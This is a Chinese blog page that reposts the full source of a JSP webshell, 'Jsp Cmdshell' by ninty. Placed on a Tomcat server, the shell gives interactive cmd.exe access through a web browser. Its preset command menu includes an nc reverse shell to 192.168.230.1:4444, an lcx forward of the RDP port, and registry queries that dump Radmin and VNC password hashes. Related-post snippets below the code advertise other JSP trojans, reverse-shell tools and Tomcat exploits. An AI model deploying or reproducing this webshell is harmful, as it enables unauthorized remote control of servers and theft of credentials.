cmd jsp 交互

最新推荐文章于 2022-08-25 10:15:02 发布
最新推荐文章于 2022-08-25 10:15:02 发布
阅读量4k 收藏 1
点赞数
文章标签: cmd jsp string exception exe class 
<%@page pageEncoding="gbk"%>

<%@page import="java.io.*"%>

<%!

/**

 *	Codz By ninty

 *  http://www.forjj.com/

 *	2010-01-23

 *	Windows + Tomcat 5.5 + Jdk6 + Editplus

 *	提供与cmd.exe的在线交互功能,只支持单个用户用,不要双开这个页面,流会乱的。

 *	如果想要多人同时用,请自己改代码。

 */

public static boolean isEmpty(String s) {

	return s == null || s.trim().length() == 0;

}

public static String convert(String s) throws Exception {

	if (isEmpty(s))

		return "";

	return new String(s.getBytes("iso-8859-1"));

}

static String cmd = "first";

static Process pro = null;

class StreamConnector extends Thread {

		private InputStream is;

		private OutputStream os;

		private String name;

		public StreamConnector( InputStream is, OutputStream os ,String name){

			this.is = is;

			this.os = os;

			this.name = name;

		}

		public void run(){

			BufferedReader in  = null;

			BufferedWriter out = null;

			try{

				in  = new BufferedReader( new InputStreamReader(this.is));

				out = new BufferedWriter( new OutputStreamWriter(this.os));

				char buffer[] = new char[128];

				if(this.name.equals("exeRclientO")) {

					//从EXE读向客户端写

					int length = 0;

					while((length = in.read( buffer, 0, buffer.length ))>0){

						String str = new String(buffer, 0, length);

						str = str.replace("&","&amp;").replace("<","&lt;").replace(">","&gt;");

						str = str.replace(""+(char)13+(char)10,"<br/>");

						str = str.replace("/n","<br/>");

						out.write(str.toCharArray(), 0, str.length());

						out.flush();

					}

				} else {

					//从客户端读向EXE写。

					while(true) {

						while(cmd == null) {

							Thread.sleep(500);

						}

						if (cmd.equals("first")) {

							cmd = null;

							continue;

						}

						cmd = cmd + (char)10;

						char[] arr = cmd.toCharArray();

						out.write(arr,0,arr.length);

						out.flush();

						cmd = null;

					}

				}

			} catch(Exception e){

			}

				try{

					if(in != null)

						in.close();

					if(out != null)

						out.close();

				} catch( Exception e ){

				}

			}

}

%>

<%

String o = request.getParameter("o");

if (isEmpty(o))

	o = "index";

else 

	o = o.trim().toLowerCase();

if (o.equals("index")) {

%>

<html>

		<head>

			<title>Jsp Cmdshell...   ==- ninty -==</title>

			<style type="text/css">

			body{margin:0px;padding:10px;font: 12px Arial,Tahoma;line-height: 16px;}

			.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}

			.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}

			.tip{color:red;font-weight:bold;}

			hr{border: 1px solid rgb(221, 221, 221); height: 0px;}

			.secho{height:75%;width:100%;overflow:auto;border:none}

			</style>

			<script>

				function $(id) {

					return document.getElementById(id);

				}

				var ie = window.navigator.userAgent.toLowerCase().indexOf("msie") != -1;

				window.onload = function(){

					setInterval(function(){

						if ($("autoscroll").checked)

						{

							var f = window.frames["echo"];

							if (f && f.document && f.document.body)

							{

								if (!ie)

								{

									if (f.document.body.offsetHeight)

									{

										f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);

									}

								} else {

									f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);

								}

							}

						}

					},500);

				}

			</script>

		</head>

		<body>

			<form action="" method="post" target="echo" οnsubmit="$('cmd').focus()">

			<input type="submit" value=" 开始交互 " class="bt">

				<input type="text" name="exe" style="width:300px" class="input" value="c:/windows/system32/cmd.exe"/>

				<input type="hidden" name="o" value="start"/><span class="tip">注意,如果你用的是IE,在点完“开始交互”按钮以后可能需要先输入一个命令以后才能看到回显</span>

			</form>

			<hr/>

				<iframe class="secho" name="echo" src="">

				</iframe>

				<form action="" method="post" οnsubmit="this.submit();$('cmd').value='';return false;" target="asyn">

					<input type="text" id="cmd" name="cmd" class="input" style="width:80%">

					<input name="o" id="o" type="hidden" value="execute"/>

					<select οnchange="$('cmd').value = this.value;$('cmd').focus()">

						<option value="" selected> </option>

						<option value="set">set</option>

						<option value="netstat -an">netstat -an</option>

						<option value="net user">net user</option>

						<option value="tasklist">tasklist</option>

						<option value="tasklist /svc">tasklist /svc</option>

						<option value="net start">net start</option>

						<option value="net stop policyagent /yes">net stop</option>

						<option value="nbtstat -A IP">nbtstat -A</option>

						<option value='reg query "HKLM/System/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp" /v "PortNumber"'>reg query</option>

						<option value='reg query "HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/Parameters/" /v "Parameter"'>radmin hash</option>

						<option value='reg query "HKEY_LOCAL_MACHINE/SOFTWARE/RealVNC/WinVNC4" /v "password"'>vnc hash</option>

						<option value="nc -e cmd.exe 192.168.230.1 4444">nc</option>

						<option value="lcx -slave 192.168.230.1 4444 127.0.0.1 3389">lcx</option>

						<option value="systeminfo">systeminfo</option>

						<option value="net localgroup">view groups</option>

						<option value="net localgroup administrators">view admins</option>

					</select>

					<input type="checkbox" checked="checked" id="autoscroll">自动滚屏

					<input type="button" value="断开" class="bt" οnclick="$('o').value='stop';this.form.submit()">

				</form>

			<hr/>

			<span>

				Ninty 'Blog <a href="http://www.forjj.com/" target="_blank">http://www.forjj.com/</a>

			</span>

			<iframe style="display:none" name="asyn"/>

		</body>

	</html>

<%

} else if (o.equals("start")) {

	String exe = request.getParameter("exe");

	if (!isEmpty(exe)) {

		pro = Runtime.getRuntime().exec(exe);

		ByteArrayOutputStream outs = new ByteArrayOutputStream();

		response.setContentLength(100000000);

		new StreamConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR").start();

		new StreamConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO").start();

		new StreamConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO").start();//错误信息流。

		Thread.sleep(1000 * 60 * 60 * 24);

	}

} else if (o.equals("execute")) {

	String command = request.getParameter("cmd");

	if (!isEmpty(command)) {

		cmd = convert(command);

	}

} else if (o.equals("stop")) {

	pro.destroy();

}

%>
mmllkkjj
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jsp webshell cmd
10-18
jsp webshell cmd jsp 代码
一个Jsp写的木马文件
tasty
09-10 3903
<%! /** * Code By Ninty * Date 2009-12-17 * Blog http://www.Forjj.com/ * Yue . I Love You. */ private static final String PW = "ninty"; //password private st
一个木马文件--jsp写的
龙企阁
08-04 508
这是一个jsp写的木马程序,部署在tomcat的项目根目录下,访问这个jsp,然后服务器的信息,数据库连接,文件系统都可以通过这个jsp访问到。 上传这个jsp文件的用意是:代码都是用的我们最简单的基础只是,基础才是最重要的!!! &lt;%@page pageEncoding="utf-8"%&gt; &lt;%@page import="java.io.*"%&gt; &lt;%@...
nc连接获取shell
lionwerson的博客
12-09 5530
1.渗透过程中免不了获取shell,可以通过nc工具连接,当然还有其他很多的工具,只不过nc默认安装在linux中,比较方便。 nc正向连接,防火墙不阻挡外来流量: 客户端: nc -e cmd 192.168.0.18 4444 #主动连接客户端的4444端口 服务端: nc -lvvp 4444 #监听4444端口 nc反向连接,防火墙阻挡外部流量: 服务端: nc -l -p 4444 -t -e cmd.exe #-t通过telnet模式执行,可以省略 客户端: ..
cmd.jsp 经典版
Sunc23的专栏
12-03 2205
try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c)
jsp cmd
mmllkkjj的专栏
01-14 1319
<br />http://hi.baidu.com/forhack/blog/item/9ebaf70673b95b7e02088181.html<br /> <br /><%@ page contentType="text/html; charset=gb2312"%><br /> <%@ page import="java.io.*"%><br /> <html><br /> <head><title>jspcmd功能</title><br /> </head><br /> <body bg
Python Cmd0.0.1
最新发布
08-21
Python3用户需安装datetime与tqdm exit 退出 list 查看下载的文件 python3 打开python3 cmd install python3 下载python3 cmd uninstall python3 卸载python3 version 查看版本 now time 显示现在的时间
cmd命令
10-27
cmd命令打开文本文档_善用bat命令提高办公效率_weixin_39876145的博客-CSDN博客.pdf
cmd执行vbs脚本
12-05
我个人喜欢研究cmd,后面无意中接触到vbs,就思考cmd能运行vbs么?---答案是可以的。经过研究发现,cmd可以执行vbs,但是还是需要生成vbs文件,执行完成后删除vbs文件
cmd_cmd_
10-04
模仿cmd.exe,可能有一些BUG或错误
jsp马集合[自用,莫下]
04-27
jsp马集合 WAR JSP一句话 JSP一句话 jsp马集合 WAR
JSP脚本反弹程序
10-20
实现shell反弹到指定地址,进行交互式SHELL管理!
好用的cmdshell反弹工具
06-19
好用的cmdshell反弹工具;好用的cmdshell反弹工具
apahce tomcat暴力破解
mingyqf的博客
11-22 1191
实战演练 在此之前,我想先说一下,我们在暴力破解账号密码时同样可以使用hydra和burp,不同攻击都有不同方法,这次我们仅仅谈论Metasploit下的相关模块,来进行针对性破解。 1、靶机xxx有一个Tomcat服务,为8080端口,浏览器访问: http://192.168.206.1:8080/manager/html 或者 http://127.0.0.1:8080/manager/html 2、可以看到弹出了一个认证界面,要求输入账号密码,抛开实验环境来谈,我们并不知道目标账号密码,那么现在我们
【Tomcat-8.5.19】文件写入漏洞
m0_63241485的博客
08-25 3341
tomcat后端使用org.apache.catalina.servlets.JspServlet来处理jsp或是jspx后缀的请求, 而JspServlet负责处理所有JSP和JPSX类型的动态请求, 从代码没有发现处理HTTP PUT类型的操作,所以可知PUT以及DELTE等HTTP操作由DefautServelt实现。该漏洞实际上是利用了windows下文件名解析的漏洞来触发的。
一段在JSP操作CMD的小代码
java开发指南博客 【转载】
10-17 304
jsp或者java里面执行CMD命令的小代码. &lt;%@ page import="java.io.*" %&gt; &lt;% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInput...
python cmd交互
07-27
对于 Python 的 cmd 交互,您可以使用 Python 内置的 cmd 模块来实现。下面是一个简单的示例代码: ```python import cmd class MyCmd(cmd.Cmd): prompt = '>> ' def do_hello(self, line): print("Hello, ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值